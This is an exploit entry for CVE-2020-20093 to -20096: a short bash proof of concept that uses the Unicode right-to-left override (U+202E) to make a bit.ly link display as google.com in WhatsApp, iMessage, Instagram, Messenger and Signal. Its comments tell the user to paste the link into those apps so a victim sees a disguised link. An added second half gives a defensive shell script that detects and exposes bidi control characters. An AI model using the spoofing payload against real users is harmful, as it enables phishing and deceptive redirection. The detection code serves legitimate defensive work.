# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096
# Date: 24/03/2022
# Exploit Authors: zadewg & Sick Codes
# Vendor Homepage: https://www.meta.com
# Vendor Homepage: https://www.instagram.com
# Vendor Homepage: https://www.apple.com
# Vendor Homepage: https://www.signal.org
# Tested on: Whatsapp iOS
# Version 2.19.80 and below
# Tested on: Whatsapp Android
# Version 2.19.222 and below
# Tested on: Instagram iOS
# Version: 106.0 and below
# Tested on: Instagram iOS Android 107.0.0.11
# Version: 107.0.0.11 and below
# Tested on: iMessage (Messages app)
# Version: iOS 14.3 and below
# Tested on: Facebook Messenger app iOS
# Version: 227.0 and below
# Tested on: Facebook Messenger app Android
# Version: 228.1.0.10.116 and below
# Tested on: Signal
# Version: 5.33.0.25 and below
# CVE: CVE-2020-20093
# CVE: CVE-2020-20094
# CVE: CVE-2020-20095
# CVE: CVE-2020-20096

#!/bin/bash
# Author: sickcodes
# Contact: https://twitter.com/sickcodes
#          https://github.com/sickcodes
# Copyright: sickcodes (C) 2022
# License: GPLv3+
# References: https://github.com/zadewg/RIUS
#             https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh
#             https://sick.codes/sick-2022-40

APPEAR_AS='https://google.com'
DESTINATION='bit.ly/3ixIRwm'

printf "\n\n${APPEAR_AS}/\u202E${DESTINATION}\n\n"

# copy paste into any of the above apps.
# victim will see a surreptitious link
# works on latest Signal (unpatched)
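
A defensive counterpart to the PoC above, as an added example that is not part of the original exploit script: a POSIX shell check that detects bidirectional control characters such as U+202E in message text and rewrites them as visible markers, so a link can be reviewed in its logical order. The function names and the example.com sample string are constructed for illustration.

```shell
#!/bin/sh
# Added defensive example, not part of the original PoC.
# Flags Unicode bidirectional controls in message text and rewrites them as
# visible <U+XXXX> markers so a link is reviewed in logical (byte) order.

# Code point = UTF-8 bytes (printf octal escapes), one pair per line:
# embeddings/overrides U+202A..U+202E and isolates U+2066..U+2069.
bidi_table() {
    printf 'U+202A=\342\200\252\nU+202B=\342\200\253\nU+202C=\342\200\254\n'
    printf 'U+202D=\342\200\255\nU+202E=\342\200\256\nU+2066=\342\201\246\n'
    printf 'U+2067=\342\201\247\nU+2068=\342\201\250\nU+2069=\342\201\251\n'
}

# Exit status 0 if $1 contains any bidi control, 1 otherwise.
has_bidi_control() {
    for _pair in $(bidi_table); do
        case "$1" in
            *"${_pair#*=}"*) return 0 ;;
        esac
    done
    return 1
}

# Print $1 with every bidi control replaced by its <U+XXXX> marker.
reveal_bidi_controls() {
    _text=$1
    for _pair in $(bidi_table); do
        # LC_ALL=C makes sed match the raw UTF-8 bytes in any locale.
        _text=$(printf '%s' "$_text" |
            LC_ALL=C sed "s/${_pair#*=}/<${_pair%%=*}>/g")
    done
    printf '%s\n' "$_text"
}

# Constructed sample: RLO (U+202E) embedded after the visible host.
sample=$(printf 'https://example.com/\342\200\256gro.elpmaxe')
if has_bidi_control "$sample"; then
    printf 'bidi control found: %s\n' "$(reveal_bidi_controls "$sample")"
fi
```

A message pipeline or log reviewer can call `has_bidi_control` on any text that contains a URL and show the `reveal_bidi_controls` form instead of the raw string.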